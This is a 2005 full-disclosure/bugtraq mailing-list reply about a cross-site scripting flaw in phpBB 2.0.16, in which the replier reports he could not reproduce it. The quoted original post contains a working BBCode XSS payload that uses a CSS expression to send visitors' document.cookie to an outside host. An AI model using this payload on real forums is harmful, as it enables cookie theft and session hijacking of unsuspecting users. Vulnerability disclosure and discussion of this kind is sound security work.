
Date: Mon, 11 Jul 2005 21:23:47 -0400 (EDT)
From: Paul Laudanski <zx@...tlecops.com>
To: alex <pigrelax@...dex.ru>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: XSS in nested tag in phpbb 2.0.16


Interestingly I have tried this using IE XP SP2 and could not replicate.  
I'll certainly be trying this out again on a vanilla installation.

I'm curious what the hit rate of this is for folks running phpbb 2.0.16?

On Tue, 5 Jul 2005, alex wrote:

> [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'styl
> e='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antic
> hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/u
> rl][/url]'[/color]
> 
> More info:
> http://www.securitylab.ru/55612.html
> 
> and
> 
> http://antichat.ru/txt/phpbb/
> 
> (In Russian)

-- 
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com


________ Information from Computer Cops, L.L.C. ________
This message was checked by NOD32 Antivirus System for Linux Mail Server.

  part000.txt - is OK
http://castlecops.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


